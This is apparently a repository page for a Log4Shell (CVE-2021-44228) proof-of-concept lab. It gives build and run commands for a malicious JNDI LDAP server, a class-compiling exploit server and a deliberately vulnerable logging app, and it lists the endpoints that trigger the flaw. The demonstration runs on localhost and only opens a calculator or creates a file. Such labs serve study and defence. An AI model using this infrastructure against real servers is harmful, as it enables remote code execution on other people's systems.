来源

关联漏洞

描述

CVE-2021-44228 demo webapp

介绍

# CVE-2021-44228-POC
Yet another CVE-2021-44228 POC

Affected Log4j versions: from 2.0-beta9 up to 2.14.1

## Prerequisites 

Used Java: OpenJDK 11
 - https://jdk.java.net/archive/

Maven required to build apps in this repo (alternatively, download prepared jar files from release):
 - https://maven.apache.org/

## Building & Running the projects 

Directories description: 
 - jndi - project with JNDI LDAP Reference server
 - web - project with vulnerable server
 - provider - project with code compiler & server
 - resources - directory for additional resources (like screenshots)

Build projects with: 
```
mvn clean install
```

Run jars with:
```
java -jar <jar>
```

Files to run (these files will be generated in: <repo_name>/<project_name>/target):
 - jndi-1.0.0-jar-with-dependencies.jar (run with: java -jar jndi-1.0.0-jar-with-dependencies.jar "http://127.0.0.1:8081/#Exploit")
 - web-1.0.0.jar (run with: java -jar web-1.0.0.jar) - runs on port 8080
 - provider-1.0.0.jar (run with: java -jar provider-1.0.0.jar) - runs on port 8081

***Alternatively build and run docker image - Docker section below Screenshots***

## Basic usage

0. Start all projects (as above)
1. Go to http://127.0.0.1:8081/
2. Copy exploit template and paste it in Java Code box
3. Go to vulnerable logger at: http://127.0.0.1:8080/
4. Copy payload from example and send it to the logger
5. Calc app should open (Windows). In case of Linux and Mac, empty file named "PWNED" should be created in \/tmp directory

## Description

Currently, the vulnerability can be exploited via: 
 - */logAction* -> post endpoint (triggers with payload in request headers or "payload" param)
 - */logGetHeaders* -> get endpoint (trigger with request headers)
 - */logPut* -> put endpoint (trigger with request headers or request body)
 - */logDelete* -> delete endpoint (trigger with request headers or request body):

## Screenshots 

Java version:\
![Java version image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/javaVer.png)

Exploit preparation + Compilation + Serving class file:\
![Exploit preparation image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/provider.png)

Payload (to be delivered to log4j) preparation + Sending the payload:\
![Payload image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/web.png)

JNDI Reference:\
![JNDI Reference image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/jndiRef.png)

Exploitation result (Windows):\
![Exploitation result (win) image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/exploitation_win.png)

Exploitation result (GNU/Linux):\
![Exploitation result (lin) image](https://github.com/MkTech-0-8YT3/CVE-2021-44228/blob/master/resources/screenshots/exploitation_lin.png)

## Docker

You can also build docker image with Dockerfile located in main repo directory.
Instructions:
```
docker build . -t log4j_vuln
docker run -p 8080:8080 -p 8081:8081 log4j_vuln
```

To find CONTAINER_ID: 
```
docker ps
```

To see exploitation result (inside container):
```
docker exec -it <CONTAINER_ID> bash
ls -la /tmp
```

Kill docker container with: 
```
docker container kill <CONTAINER_ID>
```

## Disclaimer

Code presented in this repository is intended to be used **FOR EDUCATIONAL PURPOSES ONLY**.\
I do not aid, or endorse any malicious usage of data from this repository. 

Additionally, code in this repository is shared on an 'AS IS' BASIS - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND.

## More information

https://www.lunasec.io/docs/blog/log4j-zero-day/

文件快照

 [4.0K]  /data/pocs/2b17bc618700351d3eabe460573504f27278cca8
├── [ 729]  Dockerfile
├── [4.0K]  jndi
│   ├── [1.4K]  pom.xml
│   └── [4.0K]  src
│       └── [4.0K]  main
│           └── [4.0K]  java
│               └── [4.0K]  com
│                   └── [4.0K]  jndi
│                       └── [4.0K]  serv
│                           ├── [2.7K]  LDAPServer.java
│                           └── [2.8K]  OperationInterceptor.java
├── [4.0K]  provider
│   ├── [1.3K]  pom.xml
│   └── [4.0K]  src
│       ├── [4.0K]  main
│       │   ├── [4.0K]  java
│       │   │   └── [4.0K]  com
│       │   │       └── [4.0K]  code
│       │   │           └── [4.0K]  provider
│       │   │               ├── [ 280]  BaseController.java
│       │   │               ├── [1.8K]  BaseRestController.java
│       │   │               ├── [ 422]  Compiler.java
│       │   │               ├── [1.3K]  FileService.java
│       │   │               └── [ 314]  ProviderApplication.java
│       │   └── [4.0K]  resources
│       │       ├── [  17]  application.properties
│       │       └── [4.0K]  templates
│       │           └── [1.6K]  index.html
│       └── [4.0K]  test
│           └── [4.0K]  java
│               └── [4.0K]  com
│                   └── [4.0K]  code
│                       └── [4.0K]  provider
│                           └── [ 211]  ProviderApplicationTests.java
├── [3.6K]  README.md
├── [4.0K]  resources
│   ├── [4.0K]  docker
│   │   └── [ 183]  startup.sh
│   └── [4.0K]  screenshots
│       ├── [ 21K]  exploitation_lin.png
│       ├── [148K]  exploitation_win.png
│       ├── [5.1K]  javaVer.png
│       ├── [3.8K]  jndiRef.png
│       ├── [ 59K]  provider.png
│       └── [ 13K]  web.png
└── [4.0K]  web
    ├── [1.8K]  pom.xml
    └── [4.0K]  src
        ├── [4.0K]  main
        │   ├── [4.0K]  java
        │   │   └── [4.0K]  com
        │   │       └── [4.0K]  log4shell
        │   │           └── [4.0K]  web
        │   │               ├── [ 281]  BaseController.java
        │   │               ├── [2.0K]  LogController.java
        │   │               └── [ 304]  WebApplication.java
        │   └── [4.0K]  resources
        │       ├── [   1]  application.properties
        │       └── [4.0K]  templates
        │           └── [ 945]  index.html
        └── [4.0K]  test
            └── [4.0K]  java
                └── [4.0K]  com
                    └── [4.0K]  log4shell
                        └── [4.0K]  web
                            └── [ 206]  WebApplicationTests.java

38 directories, 28 files

备注